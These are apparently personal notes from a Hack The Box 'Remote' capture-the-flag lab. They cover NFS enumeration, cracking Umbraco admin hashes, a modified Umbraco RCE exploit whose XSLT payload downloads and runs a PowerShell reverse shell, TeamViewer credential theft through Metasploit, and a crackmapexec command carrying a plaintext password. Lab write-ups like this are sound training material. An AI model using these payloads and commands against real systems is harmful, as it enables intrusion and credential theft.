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We find a network file system Pasted image 20220713093249.png

Make a directory for it

mkdir site_backups

and mount it

sudo mount -t nfs 

There are a bunch of files. These appear to be the backup files for umbro CMS.

Pasted image 20220713093325.png

We find some interesting content in App_data/Umbraco.sdf

strings Umbraco.sdf | head -n 20

We have the following username/hash combos

admin:b8be16afba8c314ad33d812f22a04991b90e2aaa (SHA1)
smith:jxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts= (HMACSHA256)
ssmith:jxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts= (HMACSHA256)

We're able to crack admin's hash using crackstation Pasted image 20220713101041.png


We can now log in, but need to use the admin's email: admin@htb.local

Now we can use EDB-49488 which grants RCE through Umbraco with credentials.

python3 -u admin@htb.local -p baconandcheese -i http://remote:80/ -c whoami

Pasted image 20220713102533.png

This exploit seemed limited, so I switched to a similar exploit EDB-46153

We had to make a few changes to the exploit, those are highlighted in yellow. This payload will ping our machine, we watch with Wireshark to verify RCE

Pasted image 20220713104157.png

It works!

Pasted image 20220713104248.png

Then use inmemory injection to run a Powershell reverse shell.

We use this powershell script:

with this line added at the end

Invoke-PowershellTcp -Reverse -IPAddress -Port 4444

and name the file shell.ps1

Now update our exploit payload, a few notes: - I was getting errors and felt like it was related to the quotes so I surrounded teh whole payload in trip quotes """

payload = """<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "IEX (new-object net.webclient).downloadstring('')"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "powershell"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> """;

login = "admin@htb.local";
host = "";

this gives us a shell. We see the user has SeImpersonatePrivilege Enabled.

Pasted image 20220713120713.png and the only other user worth going after is Administrator

Pasted image 20220713120800.png

We can use post/windows/gather/credentials/teamviewer_passwords in metasploit, but it requires a valid meterpreter session. Pasted image 20220713121652.png

Lets generate a meterpreter payload, copy it over, and get a session up.

Now we run the command and get a password

Pasted image 20220713122134.png

lets try that as Administrator's password:

It works, AAND we can use smb to get a shell.

Pasted image 20220713122302.png

We'll specify the same powershell command we used earlier to get a shell.

crackmapexec smb -u Administrator -p '!R3m0te!' -X "IEX (new-object net.webclient).downloadstring('')"

It worked!

Pasted image 20220713122535.png